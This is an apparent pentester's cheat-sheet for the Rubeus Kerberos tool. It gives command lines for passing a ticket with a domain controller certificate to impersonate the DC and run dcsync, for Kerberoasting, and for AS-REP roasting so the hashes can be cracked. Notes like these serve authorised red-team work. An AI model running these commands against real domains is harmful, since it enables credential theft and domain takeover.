Page cover image

Rubeus

Building Rubeus

Open the .sln in visual studio and go to Build > Build Rubeus before the expired license comes up ;)

By default, it installs the exe in the Rubeus\bin\Debug\ folder.

Importing ticket with certificate

$ Rubeus.exe asktgt /user:DC# /domain:<domain name> /certificate:<base cert> /ptt

After this you should get "Ticket Successfully Imported"

At this point you are effectively that DC, you can then runs things almost as a Domain Admin. Such as dcsync for a DA account

Kerberoasting

$ Rubeus.exe kerberoast /outfile:kerbhashes.txt /format:hashcat /domain:<domain> /dc:<FQDN of dc> /creduser:<user>

Asreproast

On a ps instance being ran as netuser for the cracked user account....

$ .\Rubeus.exe asreproast

If no users have 'Do not require Kerberos preauth' checked, then there wont be any users to roast. But if there is....

We get a hash for the user and crack it!

Last updated